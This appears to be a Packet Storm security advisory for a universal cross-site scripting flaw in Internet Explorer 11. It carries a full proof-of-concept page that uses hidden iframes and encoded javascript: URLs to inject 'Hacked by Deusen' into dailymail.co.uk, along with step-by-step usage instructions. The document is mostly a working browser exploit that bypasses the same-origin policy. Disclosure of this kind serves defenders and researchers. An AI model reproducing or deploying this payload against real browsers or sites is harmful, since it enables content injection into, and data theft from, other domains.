Internet Explorer 11 Same Origin Bypass

2015-02-02T00:00:00
ID PACKETSTORM:130208
Type packetstorm
Reporter David Leo
Modified 2015-02-02T00:00:00

Description

                                        
                                            `<title>insider3show</title>  
<body style="font-family:Georgia;">  
<h1>insider3show</h1>  
  
<iframe style="display:none;" width=300 height=300 id=i name=i src="1.php"></iframe><br>  
<iframe width=300 height=100 frameBorder=0 src="http://www.dailymail.co.uk/robots.txt"></iframe><br>  
<script>  
function go()  
{  
w=window.frames[0];  
w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\\'Close this window after 3 seconds...\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\\';'))",1);  
}  
setTimeout("go()",1000);  
</script>  
  
<b>Summary</b><br>  
An Internet Explorer vulnerability is shown here:<br>  
Content of dailymail.co.uk can be changed by external domain.<br>  
<br>  
<b>How To Use</b><br>  
1. Close the popup window("confirm" dialog) after three seconds.<br>  
2. Click "Go".<br>  
3. After 7 seconds, "Hacked by Deusen" is actively injected into dailymail.co.uk.<br>  
<br>  
<b>Screenshot</b><br>  
<a href="screenshot.png">screenshot.png</a><br>  
<br>  
<b>Technical Details</b><br>  
Vulnerability: Universal Cross Site Scripting(XSS)<br>  
Impact: Same Origin Policy(SOP) is completely bypassed<br>  
Attack: Attackers can steal anything from another domain, and inject anything into another domain<br>  
Tested: Jan/29/2015 Internet Explorer 11 Windows 7<br>  
<br>  
<h1><a href="http://www.deusen.co.uk/">www.deusen.co.uk</a></h1><script type="text/javascript">  
//<![CDATA[  
try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mirage2:0,oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dok3v=1613a3a185/"},atok:"6e87366c9054a61c3c7f1d71c9cfb464",petok:"0fad4629f14e9e2e51da3427556c8e191894b109-1422897396-1800",zone:"deusen.co.uk",rocket:"0",apps:{}}];CloudFlare.push({"apps":{"ape":"9e0d475915b2fa34aea396c09e17a7eb"}});!function(a,b){a=document.createElement("script"),b=document.getElementsByTagName("script")[0],a.async=!0,a.src="//ajax.cloudflare.com/cdn-cgi/nexp/dok3v=919620257c/cloudflare.min.js",b.parentNode.insertBefore(a,b)}()}}catch(e){};  
//]]>  
</script>  
  
  
`